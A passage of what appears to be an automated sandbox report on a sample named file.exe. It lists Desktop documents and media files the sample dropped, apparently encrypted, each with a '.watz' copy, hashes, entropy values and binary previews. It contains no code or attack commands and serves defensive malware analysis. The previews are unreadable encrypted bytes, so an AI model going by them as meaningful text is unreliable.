..h....]zD.&.D.....(.>..E;/....E.3..m..Vh.v.xz...f\........b.Z.F;o.\|../R,......G...t..@.;..~VR{..\.....R.Z.5.c...M.r1.A....}

C:\Users\user\Desktop\VLZDGUKUTZ.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83437771746549
Encrypted:	false
SSDEEP:	24:Vw7JTrcqBqUlB39K0GLhKVblNuI6CH8k1/Im7ZhA1zWLdRoufcOadcZWYjDbD:eFrvvwXcaCck1901CxZ7vXD
MD5:	483A23AC1413E38EBD77AC76794BF77C
SHA1:	7F33E324CE9CC4054467B235B85D4C3E079C6856
SHA-256:	A4F469C545DFC266CB14CCC48DA7192FE5C06474FBDA52E9006ADE4677C1BFAE
SHA-512:	A0994E223BF0FF79CA85AC29AA3D11D0CE70E53DAA74596D94D474802D80D2CCD2AFE9E30BCC9E05844DB05C0C9B7C209FEEC5492FAAD374082EF49D59937D27
Malicious:	false
Preview:	VLZDG....X.o..V...n.^.jdG[Qr.$.O.(t...t.._1.......s.0.8rH_`...8)...P>l ..x..-.J...,Ny.....[..?1CI.S.F....@.{W..................k.?"+.....pF.M.t.b.....S.4 UE.$.....b\.0...7....9Zi..>...c.&..}..Jl(M.E.3....a.e...^?`D?S.6..^.S.>..xc>L...P@.....V3..a. d6..q8nY9.3...vg...;jG.P.".)....gTl..1...wXM?J.6A>...}...PA..\....c9......2...$......9.".....{....I....$..u..)...G..W.(\K...53.?......y...r.,.\|.>Q...u.i>..t....dhA.QC............sz]c.....8..R$...C..a...v!.e.&....A...B..X...mE\]..."....)=Ra....7.@...\|k.LuZ...4.....)Q....$.e.i............R...!...nijyI........N)wy....cle.I..l.M.m..Ch.k.g"#.....<G..v .x.{t.....9...r....'.. (R...B:.....c%dk..E.......A.G....X.l.g..`r....l..X..NU.(.4.R.D](.[...$....^l[.5i\_.....s..k"1....s.`.{......CH@.M\|.e.1k.uP....'..\|..+.N .l.0..(..."je...t.....A.....C)j..+.M.F{....M.4.....T.c..~K.[...... ..h....]zD.&.D.....(.>..E;/....E.3..m..Vh.v.xz...f\........b.Z.F;o.\|../R,......G...t..@.;..~VR{..\.....R.Z.5.c...M.r1.A....}

C:\Users\user\Desktop\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850151474689571
Encrypted:	false
SSDEEP:	24:tVLWFnmWOpVVdDW+l/QdsJJec+0GU/7QmnRGdNRbaceHbD:/CFnnOzDWQ/Qdsqc+hUDQmG7t6D
MD5:	4F24B7FAB8CE5251F8CCC36AC73BE7D5
SHA1:	5A8DC7A56E49138A83850AA3BEF1E96EDDBB0578
SHA-256:	8025ADD1CC7C405BBE44BB7D8FA264BE822422739A2A3D72EE25798761B5AFB9
SHA-512:	52603A85BEE9C15CF853CE5AE110C46AC951619DCFA85F77F6D21BE804B56482E0CB6F2EF2B0343592022218917708AC2E69BD9274267C94EAF7CCA66ED41D43
Malicious:	false
Preview:	VLZDG`.......P....r..eL..-......K...T....6....X."t.Y.O...J......f.EM.+..&.'...h@.<...".sc)r\|9....I%E...O.s...n.m.a...=.U......r2b...a)k.....gZ..Q,=..H.^C.7._.p?.'..:........V..U..<pKJ...w.P......s.+.;..>..%...yo.'(Q.g..w...An-.n^...m......:.s...M....3.R...>j....3..........\|.o4.L....v!....g.Y.2.(......h....[....B..Q,Dfa.0.N.Y....@?m....n..\m.-N.&.......x.X....K....).............W..m..JG....&2.k~F....'Ht./.Y3.3.1...Y)..J.p.".K...cr....,.5s.5..,.N.=.b&...t?B..5.eE. ..@Zlw.9l>....:{.dt.C`...v8..E.".A2...x....M..}.'..J.)...s..y....00.O..:B.....a.W.....3hE.....l.....\......h3...Ph....39..s..M\...X...3.&...>.p+...[.Z..>.9.....X...n].(4...#/<.\.^..I...../.lWn"...+...}.s0._o..d.g....<..eL....q.S....ae../.....L.._.:_x.w......:kF.6.s..:.N.~..P.u....g....!#g#m.F..b.0...g`.~....F.........=b^Z.U[."...Y.m..!..E..{i.8............T`>..!F.{.C?z..i.....sf:...S...U.H...>~m>...D.........#..n...!.Qc..mQ\|3....E.}g......{.iJ....W.,6..p..j{.....m....B

C:\Users\user\Desktop\VLZDGUKUTZ.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850151474689571
Encrypted:	false
SSDEEP:	24:tVLWFnmWOpVVdDW+l/QdsJJec+0GU/7QmnRGdNRbaceHbD:/CFnnOzDWQ/Qdsqc+hUDQmG7t6D
MD5:	4F24B7FAB8CE5251F8CCC36AC73BE7D5
SHA1:	5A8DC7A56E49138A83850AA3BEF1E96EDDBB0578
SHA-256:	8025ADD1CC7C405BBE44BB7D8FA264BE822422739A2A3D72EE25798761B5AFB9
SHA-512:	52603A85BEE9C15CF853CE5AE110C46AC951619DCFA85F77F6D21BE804B56482E0CB6F2EF2B0343592022218917708AC2E69BD9274267C94EAF7CCA66ED41D43
Malicious:	false
Preview:	VLZDG`.......P....r..eL..-......K...T....6....X."t.Y.O...J......f.EM.+..&.'...h@.<...".sc)r\|9....I%E...O.s...n.m.a...=.U......r2b...a)k.....gZ..Q,=..H.^C.7._.p?.'..:........V..U..<pKJ...w.P......s.+.;..>..%...yo.'(Q.g..w...An-.n^...m......:.s...M....3.R...>j....3..........\|.o4.L....v!....g.Y.2.(......h....[....B..Q,Dfa.0.N.Y....@?m....n..\m.-N.&.......x.X....K....).............W..m..JG....&2.k~F....'Ht./.Y3.3.1...Y)..J.p.".K...cr....,.5s.5..,.N.=.b&...t?B..5.eE. ..@Zlw.9l>....:{.dt.C`...v8..E.".A2...x....M..}.'..J.)...s..y....00.O..:B.....a.W.....3hE.....l.....\......h3...Ph....39..s..M\...X...3.&...>.p+...[.Z..>.9.....X...n].(4...#/<.\.^..I...../.lWn"...+...}.s0._o..d.g....<..eL....q.S....ae../.....L.._.:_x.w......:kF.6.s..:.N.~..P.u....g....!#g#m.F..b.0...g`.~....F.........=b^Z.U[."...Y.m..!..E..{i.8............T`>..!F.{.C?z..i.....sf:...S...U.H...>~m>...D.........#..n...!.Qc..mQ\|3....E.}g......{.iJ....W.,6..p..j{.....m....B

C:\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838697694639582
Encrypted:	false
SSDEEP:	24:7X/jyB5RBeeKQqHqKnH9U3/6uIItd7W2j+2+0QJwCj65jHHKe4bmElZSbsbD:7PGnnVKQonojf3y2vQ6T5jKJbZgbmD
MD5:	8BC312F2AE536E61182D2AC71B1C5E34
SHA1:	095775C2DE8A266A2A8FE75FA041842AA7D1132A
SHA-256:	48FDD72A8386F1BD298D803B2A91634F174560C06BB1FCF6895C232A5207972C
SHA-512:	D5D84C480138FE5FE6877ACE25E993EAECA6BEAC13AA5D2D208D53DE1B43FF15B858B3F474B4784E7F5620C96502A38132EBCE77560C508788EB0ABBDA1AB69F
Malicious:	false
Preview:	DVWHK.L.b.....2^.....C..`...o.!].cM7.bM.rT...x,.....R...d...7.X.h'.d.;a......U2.."A#....(.(.T...gp..#;2.0.......[..~.bJ/.[J.A.%c'...Rp..be..G>.qi.CvkNr.1..M.....'+.......z..O.."..-...F...q.#>"~v.5.~~.Z.[..l..J.a/.S.v.mH.%Ag.JKO........4av.......EJ..&..f.X.."...........NH...\..fc.....2.s`.N.J...&...o.,s..O..y.O.#..@`q.\.....'.....tf......}F2d.>..Z...h.....s..c=D..wW1]....5..$...x.1}.)..G.$.........be#..0`1.KJ.B/z.Q..c.c,.;..b...2.....I...3\...a...HtSEv.Oc..nT.F.0fMy.Z...".~..9Q.....N...3H+.....W...#.C.0.S......t.......P...`.{eV......l.....[.+....r.-.Z....g..R .?..!..A.~".pZ{.............$...f......1!....?..--.b@d}i.B&8.. .@...B..e?.Gx.5.7.&.k(.....}.B...O.i...O.I#.M...i.....B64.....U5 ......sU;O.B..r.q.j..{.ecRi....sj..q[G~.A.._s.<1./..f../>.Z.^..}.h4...0..r`.N...x..!.>z.......W.......m.]..>...,5h$lA.>u..f.^`0..lu.Opn.q.q..;....M=.<F..FPj......--. .q....$.e.."#.*.o~.C.X;O.^.p,/.C._w..%..c{..2&...........\|^!_.....rQFc..>....=.....h...

C:\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838697694639582
Encrypted:	false
SSDEEP:	24:7X/jyB5RBeeKQqHqKnH9U3/6uIItd7W2j+2+0QJwCj65jHHKe4bmElZSbsbD:7PGnnVKQonojf3y2vQ6T5jKJbZgbmD
MD5:	8BC312F2AE536E61182D2AC71B1C5E34
SHA1:	095775C2DE8A266A2A8FE75FA041842AA7D1132A
SHA-256:	48FDD72A8386F1BD298D803B2A91634F174560C06BB1FCF6895C232A5207972C
SHA-512:	D5D84C480138FE5FE6877ACE25E993EAECA6BEAC13AA5D2D208D53DE1B43FF15B858B3F474B4784E7F5620C96502A38132EBCE77560C508788EB0ABBDA1AB69F
Malicious:	false
Preview:	DVWHK.L.b.....2^.....C..`...o.!].cM7.bM.rT...x,.....R...d...7.X.h'.d.;a......U2.."A#....(.(.T...gp..#;2.0.......[..~.bJ/.[J.A.%c'...Rp..be..G>.qi.CvkNr.1..M.....'+.......z..O.."..-...F...q.#>"~v.5.~~.Z.[..l..J.a/.S.v.mH.%Ag.JKO........4av.......EJ..&..f.X.."...........NH...\..fc.....2.s`.N.J...&...o.,s..O..y.O.#..@`q.\.....'.....tf......}F2d.>..Z...h.....s..c=D..wW1]....5..$...x.1}.)..G.$.........be#..0`1.KJ.B/z.Q..c.c,.;..b...2.....I...3\...a...HtSEv.Oc..nT.F.0fMy.Z...".~..9Q.....N...3H+.....W...#.C.0.S......t.......P...`.{eV......l.....[.+....r.-.Z....g..R .?..!..A.~".pZ{.............$...f......1!....?..--.b@d}i.B&8.. .@...B..e?.Gx.5.7.&.k(.....}.B...O.i...O.I#.M...i.....B64.....U5 ......sU;O.B..r.q.j..{.ecRi....sj..q[G~.A.._s.<1./..f../>.Z.^..}.h4...0..r`.N...x..!.>z.......W.......m.]..>...,5h$lA.>u..f.^`0..lu.Opn.q.q..;....M=.<F..FPj......--. .q....$.e.."#.*.o~.C.X;O.^.p,/.C._w..%..c{..2&...........\|^!_.....rQFc..>....=.....h...

C:\Users\user\Desktop\VLZDGUKUTZ\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.873207002785756
Encrypted:	false
SSDEEP:	24:IazzSZv1u7mmdHV8XcMdf2kDYxk2LvCG0xLJqMdvWjOcXW56UbD:Iazmp1uaCHmXp92qsaG0xLYcyOcGE+D
MD5:	FE24AE021E6BE855AE90A71BB0392039
SHA1:	96FBDFFC3DF751311304E77DE69D8B63508F0543
SHA-256:	4E9B520B82A683D8724AC2D18700F3E4122DAD581566A51B7FD37FB0F6C48867
SHA-512:	DD1A1730E99821189C693D4615C8FA46A11208EC6CCCF81EC4F4D4867FFF7B98A8FA90D8C07AF3F98128AB363C625771F2B653B497B3C85889A7C98FA57378FC
Malicious:	false
Preview:	JSDNG#w.r.....f...F.8.......'...r.n).....[.L...-.>...F3#.0...#........5.!NPY.:...P..}....U......f..NAX.......N.We......FC.1^....+..wD+;V...4!.~...'....Y.>!..x..@..}...5\|'...\.a.`.3.R....m}8..."...#..5....!..H.W+c...r..7.;.3x..@.._o...'2......G.>.t......%.U5...T.+..+.....)..Eq......1..v............3(`..+.....z...Xh...h.m.;.#...1......./sC_(2.@...D+j..UD<......#.+.H/P...O..pUj...>......w.......].c.....W...dPT...ky+.K.........q..,5..t..F.....\.f~..l:....0.&..EZo.8t.k.yk....!}r..aW.\8mt...i...a.3.....&I"....mJ.U. .9.+..[.I%...."...0Y...(......hNU....ZN....o....$P'%#3.7Mk_V^...N.f"....o.........C.c..o}.........l.^.&M....L...).....+{.c!.VoAJ.....+.M....6......;66=....r.....%jC.8w..j..=v.I....xb........2._C.C...B.(..4-o....6......7.....=...>....K.K.D.=t..~a.(5.Z.\|.SVq.-.{.L_z..o.......[:...!{.`.l..1...'s.fZ-....R..0.Y./..j.........q.@......O.5G....1...OQ .........x.ju3...<...2.V:.U...t.n2...FvO`a.6.....c...c....u..z...ql..b..5>.s

C:\Users\user\Desktop\VLZDGUKUTZ\JSDNGYCOWY.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.873207002785756
Encrypted:	false
SSDEEP:	24:IazzSZv1u7mmdHV8XcMdf2kDYxk2LvCG0xLJqMdvWjOcXW56UbD:Iazmp1uaCHmXp92qsaG0xLYcyOcGE+D
MD5:	FE24AE021E6BE855AE90A71BB0392039
SHA1:	96FBDFFC3DF751311304E77DE69D8B63508F0543
SHA-256:	4E9B520B82A683D8724AC2D18700F3E4122DAD581566A51B7FD37FB0F6C48867
SHA-512:	DD1A1730E99821189C693D4615C8FA46A11208EC6CCCF81EC4F4D4867FFF7B98A8FA90D8C07AF3F98128AB363C625771F2B653B497B3C85889A7C98FA57378FC
Malicious:	false
Preview:	JSDNG#w.r.....f...F.8.......'...r.n).....[.L...-.>...F3#.0...#........5.!NPY.:...P..}....U......f..NAX.......N.We......FC.1^....+..wD+;V...4!.~...'....Y.>!..x..@..}...5\|'...\.a.`.3.R....m}8..."...#..5....!..H.W+c...r..7.;.3x..@.._o...'2......G.>.t......%.U5...T.+..+.....)..Eq......1..v............3(`..+.....z...Xh...h.m.;.#...1......./sC_(2.@...D+j..UD<......#.+.H/P...O..pUj...>......w.......].c.....W...dPT...ky+.K.........q..,5..t..F.....\.f~..l:....0.&..EZo.8t.k.yk....!}r..aW.\8mt...i...a.3.....&I"....mJ.U. .9.+..[.I%...."...0Y...(......hNU....ZN....o....$P'%#3.7Mk_V^...N.f"....o.........C.c..o}.........l.^.&M....L...).....+{.c!.VoAJ.....+.M....6......;66=....r.....%jC.8w..j..=v.I....xb........2._C.C...B.(..4-o....6......7.....=...>....K.K.D.=t..~a.(5.Z.\|.SVq.-.{.L_z..o.......[:...!{.`.l..1...'s.fZ-....R..0.Y./..j.........q.@......O.5G....1...OQ .........x.ju3...<...2.V:.U...t.n2...FvO`a.6.....c...c....u..z...ql..b..5>.s

C:\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850510379694888
Encrypted:	false
SSDEEP:	24:22OXDGT2lt/kvSFAvXdgxJAaxOcNOk1FdzUSzPD2R8iz3Yh0L46VgbD:22OTkUsvSKloDxOctd7nhU46V6D
MD5:	DB5628F4095A01C7739336399EBCEE15
SHA1:	36B9F9D3112D66B46E15D8EE7A725B4C786D639F
SHA-256:	6F9C97E72524287B229D4CC6BCF1988CDAD90291CFC70ECBDA3BFAC0167E3708
SHA-512:	96B20A6E6D4807935EAA6A3E8879CEF9E279FC47FB2894000E68E756E6021CE40C1564A08AFBBD85AA1384C89700D2E823ACD6929A44BC1E77232B2154066DA3
Malicious:	false
Preview:	KATAX..x<...=q.[T.S...l..x..B.{...ig..;..5=.'T.}.C....?)......~......p..S. .$N....y.0_t...p.].&...P.l(...9sS<[?q(...!)/.).....;N.6.c...8`j....i.j5...E...@...6jQ.....\..c..h.F.78.....P.`a...A.H.f.n&4.z.l..n...V.z(MB#.]'l..)m.n.h!}.T}...QfY:.....F...(..)..-...>.W.5..6<.$..\|D.7.9.2.>..9.!LNI.......&..T&.oR.."s8(..]S......<.y..E.....0..-..8c...a.......uh}q[.......a.h...c...A.... ..>.9..{..u.y..B$.H....W.+GJ.3......,..P.b.z...N.g..S.V.e.....c...yd.O.....t.9<Ule.5!.;...AK2....G..,8.6...;}..}7.`+X.:.>nm...u......n.y...p..E"&.._..K..6.4........Q).........,].%.]"j..<.(.k1....J.x.'p.>..\...C......7Z#.9..........g..T.3..1..)..0Yugt...oO.&..jo9f#9.d....Y8;S.8.H..O....M.....U.M.V.........._...."?.Urs.>.F....j-..W.}...+\..Er..^.1..1?........(*....].1..e...J.....7..ye..IgN...,..7i.K....".N....#d..k.....O..Q.w.).`[...-.....;.Y....E..a@......yL=...0.z...w.5c..P=.8..KS..^.PN.o.[.(..D.f..._.N........a.?E..T)..h./s.GZz...s.1.hb]..o.!r...79@6..r..0M)....m.

C:\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850510379694888
Encrypted:	false
SSDEEP:	24:22OXDGT2lt/kvSFAvXdgxJAaxOcNOk1FdzUSzPD2R8iz3Yh0L46VgbD:22OTkUsvSKloDxOctd7nhU46V6D
MD5:	DB5628F4095A01C7739336399EBCEE15
SHA1:	36B9F9D3112D66B46E15D8EE7A725B4C786D639F
SHA-256:	6F9C97E72524287B229D4CC6BCF1988CDAD90291CFC70ECBDA3BFAC0167E3708
SHA-512:	96B20A6E6D4807935EAA6A3E8879CEF9E279FC47FB2894000E68E756E6021CE40C1564A08AFBBD85AA1384C89700D2E823ACD6929A44BC1E77232B2154066DA3
Malicious:	false
Preview:	KATAX..x<...=q.[T.S...l..x..B.{...ig..;..5=.'T.}.C....?)......~......p..S. .$N....y.0_t...p.].&...P.l(...9sS<[?q(...!)/.).....;N.6.c...8`j....i.j5...E...@...6jQ.....\..c..h.F.78.....P.`a...A.H.f.n&4.z.l..n...V.z(MB#.]'l..)m.n.h!}.T}...QfY:.....F...(..)..-...>.W.5..6<.$..\|D.7.9.2.>..9.!LNI.......&..T&.oR.."s8(..]S......<.y..E.....0..-..8c...a.......uh}q[.......a.h...c...A.... ..>.9..{..u.y..B$.H....W.+GJ.3......,..P.b.z...N.g..S.V.e.....c...yd.O.....t.9<Ule.5!.;...AK2....G..,8.6...;}..}7.`+X.:.>nm...u......n.y...p..E"&.._..K..6.4........Q).........,].%.]"j..<.(.k1....J.x.'p.>..\...C......7Z#.9..........g..T.3..1..)..0Yugt...oO.&..jo9f#9.d....Y8;S.8.H..O....M.....U.M.V.........._...."?.Urs.>.F....j-..W.}...+\..Er..^.1..1?........(*....].1..e...J.....7..ye..IgN...,..7i.K....".N....#d..k.....O..Q.w.).`[...-.....;.Y....E..a@......yL=...0.z...w.5c..P=.8..KS..^.PN.o.[.(..D.f..._.N........a.?E..T)..h./s.GZz...s.1.hb]..o.!r...79@6..r..0M)....m.

C:\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867363364818362
Encrypted:	false
SSDEEP:	24:DNN/pchqXdXlEzX8MY+N1bxSBRSX58jK+lchUpGomboZBnbD:DN5u+u4+TbQSXejIUpGo+kbD
MD5:	66D7E7F0B6A906A68D91D2A598E899C8
SHA1:	65DBE65CC642F4EC6DB25329FB1B6907585B33A0
SHA-256:	7BB418D1080AE1B894E7578ABE41B14210AE6401CCAEF29675DF1468C7285436
SHA-512:	51013B60617F0BDA7E82206D065A58D14DF5594B9FAABB8A7EAE3CD375C545CF62A77B82BACAB9363B22BE3FD307C80B931CCC997FD95CCCFD86D3212AB3C3DA
Malicious:	false
Preview:	NWTVC.....J.....>..Q...n.Q.1'..Fx.S......M.$tc.T...."pk.fx...2<..#.'...9..q......L...eh...o.5Qp.....w..YUg>.........8P.h..n.xx.J......20}.wf`...>........p....QSbt.HJ....$.p.<..b)2J...s2.].f..f..~.)[.{..rK..<X..7..j8...../.=.M.. ./.3.hB....+q...DG...x....Mc#?.....N.O..K:..cy."........(.. }3....e..,......-c?3....o..Y\|(......>..u..^..>..a\.OP.+0ah..I2...u.........=...:.....X..g..p.......{:..........O....(.c...jtq!....h..kB...q..L..Q......+g...._..C.....D.......Z.LH:_4..d.s./KU^F)q..$.B..B...S..=...&h3}.D......T2Xo.........;_W/1_.2..@po.>..]A......z...l.b(6...X........._.u#.."-ZS..bK(...os..\|7..O'.T.z...D.%....+/.b..K.kHx.......8~....n<............/.i.[g....h.......f .R..b....R5.........nyU.'.:.../.,.M.t...!.nNC.'.9..l...}.>.U.e....$..>..B.`..}R...3..3..i.........\|s.Wi%..G..H...]......P...no..B".1.&v....(!.P........!.\|S:/..l.oP......Q....r..@..2.5gO.72.nJ..\.@..F.M^.%-D.{I.....P.......jA...g9..~...X.(..[....%..N.;.......<.....o-e."Mo.\|.q2)..`E~.

C:\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867363364818362
Encrypted:	false
SSDEEP:	24:DNN/pchqXdXlEzX8MY+N1bxSBRSX58jK+lchUpGomboZBnbD:DN5u+u4+TbQSXejIUpGo+kbD
MD5:	66D7E7F0B6A906A68D91D2A598E899C8
SHA1:	65DBE65CC642F4EC6DB25329FB1B6907585B33A0
SHA-256:	7BB418D1080AE1B894E7578ABE41B14210AE6401CCAEF29675DF1468C7285436
SHA-512:	51013B60617F0BDA7E82206D065A58D14DF5594B9FAABB8A7EAE3CD375C545CF62A77B82BACAB9363B22BE3FD307C80B931CCC997FD95CCCFD86D3212AB3C3DA
Malicious:	false
Preview:	NWTVC.....J.....>..Q...n.Q.1'..Fx.S......M.$tc.T...."pk.fx...2<..#.'...9..q......L...eh...o.5Qp.....w..YUg>.........8P.h..n.xx.J......20}.wf`...>........p....QSbt.HJ....$.p.<..b)2J...s2.].f..f..~.)[.{..rK..<X..7..j8...../.=.M.. ./.3.hB....+q...DG...x....Mc#?.....N.O..K:..cy."........(.. }3....e..,......-c?3....o..Y\|(......>..u..^..>..a\.OP.+0ah..I2...u.........=...:.....X..g..p.......{:..........O....(.c...jtq!....h..kB...q..L..Q......+g...._..C.....D.......Z.LH:_4..d.s./KU^F)q..$.B..B...S..=...&h3}.D......T2Xo.........;_W/1_.2..@po.>..]A......z...l.b(6...X........._.u#.."-ZS..bK(...os..\|7..O'.T.z...D.%....+/.b..K.kHx.......8~....n<............/.i.[g....h.......f .R..b....R5.........nyU.'.:.../.,.M.t...!.nNC.'.9..l...}.>.U.e....$..>..B.`..}R...3..3..i.........\|s.Wi%..G..H...]......P...no..B".1.&v....(!.P........!.\|S:/..l.oP......Q....r..@..2.5gO.72.nJ..\.@..F.M^.%-D.{I.....P.......jA...g9..~...X.(..[....%..N.;.......<.....o-e."Mo.\|.q2)..`E~.

C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860961017276837
Encrypted:	false
SSDEEP:	24:E5utpnjdmlSnBLn0CjF75LIPPb2cdsKbQFTicnbzbxBYrHsR4bD:E56dmwnPjN5Li6cuKbCRBriD
MD5:	C601A414A7D819199632ACD9D5532703
SHA1:	7E342EA96EBE05DED3360F8D8450D21A20099057
SHA-256:	65C728556EF06F3ED8A802457D11926AB3D9D6C74FE3C77F8E4D3AD719209474
SHA-512:	555C65EE11A72FC99E73B35C0DED280AAA5B86957707B080080C93A69698674E49CD750AB0798BFF76C6254DD6E1518A1186C49BF997FFEA24A906C0C82BDF63
Malicious:	false
Preview:	VLZDGQ.....4v"..z.../......#.....,kR...K.i./...f\."%.\|......z... L..t...%.+.uI..c..a..u.p.3..I..y&..'j....`qVT.....7...~.l=.h..JO..{@&z.=...J.Aqc..,.f.P.8.....i...s.noh`..E...\|C$[2.wJ<z........cl<....[...m....oN,...3.....c....~ARJq...%...X.1(.lX...j..9$.MP....7..G.q..7.......=..c.j6G...8.c..k5b..<K..8.X..>."B..Yu.X.DN...8.&...W..[....$....I........jD.P..{...\|.k...."..l:..d.!"....>..[.-n..........L.....E.BG.i.1...`e.9...j.1.W.iN.....{..z....O.....KY.Y..c.I...........(w.S.....l.Xg,.t../.>....u...Yq1.=h.G@rz.o.!....q....4...u.L.d.9[_/...~..hhx.T!u.&]V.ee;.Q\|.....K4bh.=.2V..A.=......X...[..'a.$($....Sh....kA..l7.ix{..np.. ...8.D[.<.....O....T>X..Y[...V...l..1...iv.@.K<...I.-ca..Ve+4_....z. T....GT..]...J.....+..E1IT.......\..R....&Yo6Bwm..]."H...3.......JO....3l...?...u..{.~.....`..6..mw.q.Al.n..,<ENq......gl..Xg..p.....#..r..0.d.1.LOB...)..x.. .DU.k}.t'f.+....`..D.R...^x4.'...s'N.[,.......F.~{2z^..#...A..bpft.I.A......[.3Z...'....Q_I

C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860961017276837
Encrypted:	false
SSDEEP:	24:E5utpnjdmlSnBLn0CjF75LIPPb2cdsKbQFTicnbzbxBYrHsR4bD:E56dmwnPjN5Li6cuKbCRBriD
MD5:	C601A414A7D819199632ACD9D5532703
SHA1:	7E342EA96EBE05DED3360F8D8450D21A20099057
SHA-256:	65C728556EF06F3ED8A802457D11926AB3D9D6C74FE3C77F8E4D3AD719209474
SHA-512:	555C65EE11A72FC99E73B35C0DED280AAA5B86957707B080080C93A69698674E49CD750AB0798BFF76C6254DD6E1518A1186C49BF997FFEA24A906C0C82BDF63
Malicious:	false
Preview:	VLZDGQ.....4v"..z.../......#.....,kR...K.i./...f\."%.\|......z... L..t...%.+.uI..c..a..u.p.3..I..y&..'j....`qVT.....7...~.l=.h..JO..{@&z.=...J.Aqc..,.f.P.8.....i...s.noh`..E...\|C$[2.wJ<z........cl<....[...m....oN,...3.....c....~ARJq...%...X.1(.lX...j..9$.MP....7..G.q..7.......=..c.j6G...8.c..k5b..<K..8.X..>."B..Yu.X.DN...8.&...W..[....$....I........jD.P..{...\|.k...."..l:..d.!"....>..[.-n..........L.....E.BG.i.1...`e.9...j.1.W.iN.....{..z....O.....KY.Y..c.I...........(w.S.....l.Xg,.t../.>....u...Yq1.=h.G@rz.o.!....q....4...u.L.d.9[_/...~..hhx.T!u.&]V.ee;.Q\|.....K4bh.=.2V..A.=......X...[..'a.$($....Sh....kA..l7.ix{..np.. ...8.D[.<.....O....T>X..Y[...V...l..1...iv.@.K<...I.-ca..Ve+4_....z. T....GT..]...J.....+..E1IT.......\..R....&Yo6Bwm..]."H...3.......JO....3l...?...u..{.~.....`..6..mw.q.Al.n..,<ENq......gl..Xg..p.....#..r..0.d.1.LOB...)..x.. .DU.k}.t'f.+....`..D.R...^x4.'...s'N.[,.......F.~{2z^..#...A..bpft.I.A......[.3Z...'....Q_I

C:\Users\user\Desktop\VLZDGUKUTZ\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8555784197525576
Encrypted:	false
SSDEEP:	24:PXljtPTkZmSDlx5tk719lYBdmtA5mm2QTs693dkGgJlbD:vljtSmS5x5tk3lqhg4939gzD
MD5:	57F785A069D371EEAF234D7F341DCFA0
SHA1:	B22B49D412DE72168ED3596B7BE5C6C1F6C452D8
SHA-256:	E6E4D7635309EA35F376211EB5D6D6D254EE2B183A5213CA0DA29F7F1B93ACE9
SHA-512:	D500440EE036AF08E7E4490EE231E07D5E0F178458325D426F90259B68DE92C555C953817A8A3BD5BD1AD1A54FB7F020DD582C0C44CA405805CEAAF67CCCE18A
Malicious:	false
